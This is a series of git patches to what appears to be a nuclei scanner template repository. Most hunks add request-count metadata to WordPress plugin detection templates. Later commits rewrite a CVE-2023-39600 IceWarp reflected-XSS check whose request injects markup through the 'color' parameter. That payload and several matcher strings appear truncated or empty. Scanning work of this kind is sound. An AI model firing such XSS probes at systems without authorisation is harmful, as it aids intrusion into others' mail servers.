b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 208b2c8690395a7e581f1dfaf6c9e35e9ac89a50 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 19:37:34 +0530 Subject: [PATCH 0261/1090] Update CVE-2023-39600.yaml --- http/cve/2023/CVE-2023-39600.yaml | 42 ++++++++++++++++++++++++------- 1 file changed, 33 insertions(+), 9 deletions(-) diff --git a/http/cve/2023/CVE-2023-39600.yaml b/http/cve/2023/CVE-2023-39600.yaml index 9a07f6326d..69013a9270 100644 --- a/http/cve/2023/CVE-2023-39600.yaml +++ b/http/cve/2023/CVE-2023-39600.yaml @@ -1,23 +1,47 @@ -id: icewarp-xss-cve-2023-39600 +id: CVE-2023-39600 + info: - name: IceWarp Email Client XSS + name: IceWarp 11.4.6.0 - Cross-Site Scripting author: Imjust0 severity: medium - description: Checking for the XSS on the IceWarp Email Client Application via color parameter - tags: xss,cve2023,icewarp + description: | + IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. reference: - - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 - - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 - - https://cve.report/CVE-2023-39600 + - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 + - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-39600 + cwe-id: CWE-79 + epss-score: 0.0046 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* + epss-percentile: 0.72232 + metadata: + max-request: 1 + shodan-query: title:"icewarp" + vendor: icewarp + product: icewarp_server + tags: cve,cve2023,icewarp,xss + http: - method: GET path: - - '{{BaseURL}}/webmail/?color=">' + - '{{BaseURL}}/webmail/?color=">' + matchers-condition: and matchers: - type: word words: - - "" + - "" + - "IceWarp" + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 From 2b0d68f7e750685bc1845c26596192a2f4585bc8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 20:01:33 +0530 Subject: [PATCH 0262/1090] matcher update --- http/cves/2020/CVE-2020-8512.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 0a354688bf..135d1226b5 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -37,6 +37,8 @@ http: part: body words: - "" + - "IceWarp" + condition: and - type: word part: header From 8196867c7a07895844ba9c4ea9a5c75545707eee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 20:02:16 +0530 Subject: [PATCH 0263/1090] Update and rename CVE-2023-39600.yaml to CVE-2023-39600.yaml --- http/{cve => cves}/2023/CVE-2023-39600.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{cve => cves}/2023/CVE-2023-39600.yaml (100%) diff --git a/http/cve/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml similarity index 100% rename from http/cve/2023/CVE-2023-39600.yaml rename to http/cves/2023/CVE-2023-39600.yaml From 3ea7388fa2a81aa43b5fbe884549cfd08e1494fd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 20:03:49 +0530 Subject: [PATCH 0264/1090] Rename CVE-2023-39598.yaml to CVE-2023-39598.yaml --- http/{cve => cves}/2023/CVE-2023-39598.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{cve => cves}/2023/CVE-2023-39598.yaml (100%) diff --git a/http/cve/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml similarity index 100% rename from http/cve/2023/CVE-2023-39598.yaml rename to http/cves/2023/CVE-2023-39598.yaml From 4471d442e0712390b5eb2d9f0b50424638e937a5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 20:04:42 +0530 Subject: [PATCH 0265/1090] matcher update --- http/cves/2023/CVE-2023-39598.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 7c35af6ffa..c8053aa70f 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -29,6 +29,11 @@ http: - "icewarp" condition: and + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 From 8bb91fcd4fc555980f7c3b76f9b4d350bada7bef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 10 Sep 2023 20:06:14 +0530 Subject: [PATCH 0266/1090] Rename CVE-2023-38433.yaml to CVE-2023-38433.yaml --- http/{cve => cves}/2023/CVE-2023-38433.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{cve => cves}/2023/CVE-2023-38433.yaml (100%) diff --git a/http/cve/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml similarity index 100% rename from http/cve/2023/CVE-2023-38433.yaml rename to http/cves/2023/CVE-2023-38433.yaml From ebecb2c7a6d023d7021eb1624244848ff431401a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 14:40:03 +0000 Subject: [PATCH 0267/1090] Auto Generated New Template Addition List [Sun Sep 10 14:40:03 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index e07dec6dba..96939e4090 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,4 @@ http/cnvd/2021/CNVD-2021-32799.yaml -http/cve/2023/CVE-2023-38433.yaml http/cves/2016/CVE-2016-10108.yaml http/cves/2018/CVE-2018-15917.yaml http/cves/2018/CVE-2018-17153.yaml @@ -16,6 +15,7 @@ http/cves/2023/CVE-2023-32563.yaml http/cves/2023/CVE-2023-34124.yaml http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml +http/cves/2023/CVE-2023-38433.yaml 